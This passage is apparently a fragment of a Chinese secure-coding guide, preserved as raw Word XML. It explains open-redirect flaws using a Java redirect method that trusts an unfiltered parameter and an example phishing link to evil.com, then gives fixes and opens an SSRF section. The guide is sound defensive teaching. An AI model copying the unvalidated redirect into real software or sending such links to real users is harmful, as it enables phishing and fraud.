          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IM</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里对于</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的传输会进行安全校验，但是对于知名网站的域名及</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将直接允许通过并且显示为可信的</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一旦该可信的</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里包含</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转漏洞将导致安全限制被绕过。</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转最典型的例子就是登录跳转，示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F631E" w:rsidRPr="00A12C9A" w14:paraId="0A9B4BAA" w14:textId="77777777" w:rsidTr="007C382E">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C6DE79"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public void doRedirect(HttpServletRequest req, HttpServletResponse res)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A51B2A8"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3FA3AF"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 xml:space="preserve">   String </w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>jumpURL</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>=request.getParameter(“jumptoURL”);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13774373"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ab/>
              <w:t>response.setHeader("</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>",</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>jump</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>URL);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0A563E" w14:textId="37EFC445" w:rsidR="009F631E" w:rsidRPr="00A12C9A" w:rsidRDefault="009F631E" w:rsidP="00A12C9A">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12C9A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61CB3D3D" w14:textId="18C15239" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="00D75844" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>若</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>程序未过滤</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jumpto</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，攻击者将恶意链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>/login.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>?jumptoURL=http://www.evil.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>发给其他用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，安全意识较低的用户会认为该链接展现的内容是</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而产生欺诈行为。同时由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、淘宝旺旺等在线</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过滤，对部分站点会通过白名单的方式直接通过，因此恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里传播。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认为</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidR="0020193F" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可信的，但是通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里点击上述链接将导致用户最终访问</w:t>
      </w:r>
      <w:r w:rsidR="00B55269" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="00B55269" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r w:rsidR="00B55269" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>evil.com</w:t>
      </w:r>
      <w:r w:rsidR="00B55269" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF941C0"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C39F8" w14:textId="66C32AC6" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="009C6620" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转参数可控，且未对参数做白名单限制导致任意地址跳转可被利用钓鱼。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6FC11" w14:textId="7C36B270" w:rsidR="002573C1" w:rsidRPr="00A12C9A" w:rsidRDefault="009145B3" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="002573C1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对传入的</w:t>
      </w:r>
      <w:r w:rsidR="002573C1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="002573C1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做有效性的认证，保证该</w:t>
      </w:r>
      <w:r w:rsidR="002573C1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="002573C1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自于信任域。限制的方式可参考以下两种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F10BF1" w14:textId="77777777" w:rsidR="002573C1" w:rsidRPr="00A12C9A" w:rsidRDefault="002573C1" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的字段，当浏览器向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器发送请求时，一般会带上</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，告诉服务器是从哪个页面链接过来的），通过限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保证将要跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的有效性，避免攻击者生成自己的恶意跳转链接；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E1555" w14:textId="3829706A" w:rsidR="009145B3" w:rsidRDefault="002573C1" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入有效性验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，保证所有生成的链接都来自于可信域，通过在生成的链接里加入用户不可控的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对生成的链接进行校验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B67E2" w14:textId="3AA22AD8" w:rsidR="000C0F87" w:rsidRPr="00A12C9A" w:rsidRDefault="000C0F87" w:rsidP="000C0F87">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FB87DA7" w14:textId="0956774C" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="005006B1" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc498434519"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端请求伪造（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="15B66179" w14:textId="77777777" w:rsidR="00CC545C" w:rsidRPr="009910AE" w:rsidRDefault="009145B3" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00CC545C" w:rsidRPr="009910AE">
        <w:rPr>
